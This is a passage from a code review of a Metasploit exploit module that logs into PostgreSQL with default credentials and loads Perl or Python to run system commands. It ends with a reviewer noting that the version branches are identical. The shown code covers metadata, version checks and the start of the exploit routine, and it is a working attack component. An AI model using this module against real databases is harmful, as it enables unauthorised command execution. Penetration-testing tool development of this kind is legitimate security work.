modules/exploits/multi/postgres/postgres_createlang.rb

```diff
@@ -0,0 +1,258 @@
+            and has been tested on OS X, Windows, and Linux.
+
+            This module attempts to load Perl or Python to execute system commands. As this dynamically loads
+            a scripting language to execute commands, it is not necessary to drop a file on the filesystem.
+
+            Only Postgres 8 and up are supported.
+          ),
+          'Author' => [
+            'Micheal Cottingham', # author of this module
+            'midnitesnake', # the postgres_payload module that this is based on
+          ],
+          'License' => MSF_LICENSE,
+          'References' => [
+            ['URL', 'http://www.postgresql.org/docs/current/static/sql-createlanguage.html'],
+            ['URL', 'http://www.postgresql.org/docs/current/static/plperl.html'],
+            ['URL', 'http://www.postgresql.org/docs/current/static/plpython.html']
+          ],
+          'Platform' => %w(linux unix win osx),
+          'Payload' => {
+            'PayloadType' => %w(cmd)
+          },
+          'Arch' => [ARCH_CMD],
+          'Targets' => [
+            ['Automatic', {}]
+          ],
+          'DefaultTarget' => 0,
+          'DisclosureDate' => 'Jan 1 2016')
+        )
+
+    register_options([
+      OptString.new('USERNAME', [true, 'The username to the service', 'postgres']),
+      OptString.new('PASSWORD', [true, 'The password to the service', 'postgres'])
+    ], self.class)
+
+    deregister_options('SQL', 'RETURN_ROWSET', 'VERBOSE')
+  end
+
+  def check
+    version = postgres_fingerprint
+
+    if version[:auth]
+      version_match = version[:auth].match(/(?<software>\w{10})\s(?<major_version>\d{1,2})\.(?<minor_version>\d{1,2})\.(?<revision>\d{1,2})/)
+      major_version = version_match['major_version']
+
+      if major_version.to_i >= 8
+        return CheckCode::Appears
+
+      else
+        print_error "#{rhost}:#{rport} - Unsupported version - #{version[:auth]}"
+        return CheckCode::Safe
+      end
+
+    else
+      print_error "#{rhost}:#{rport} - Authentication failed"
+      return CheckCode::Safe
+    end
+  end
+
+  def exploit
+    version = do_login(username, password, database)
+
+    case version
+      when :noauth
+        print_error "#{rhost}:#{rport} - Authentication failed"
+        return
+
+      when :noconn
+        print_error "#{rhost}:#{rport} - Connection failed"
+        return
+
+      else
+        print_status "#{rhost}:#{rport} - #{version}"
+    end
+
+    version_match = version.match(/(?<software>\w{10})\s(?<major_version>\d{1,2})\.(?<minor_version>\d{1,2})\.(?<revision>\d{1,2})/)
+    major_version = version_match['major_version']
+    extension = 'LANGUAGE'
+
+    if major_version.to_i == 8
+      print_status "#{rhost}:#{rport} - Selecting version 8 attack"
+      extension = 'LANGUAGE'
+
+    elsif major_version.to_i >= 9
+      print_status "#{rhost}:#{rport} - Selecting version 9 attack"
+      extension = 'LANGUAGE'
```

Comment:
It looks like what is done for all versions is the same.  Or am I missing something?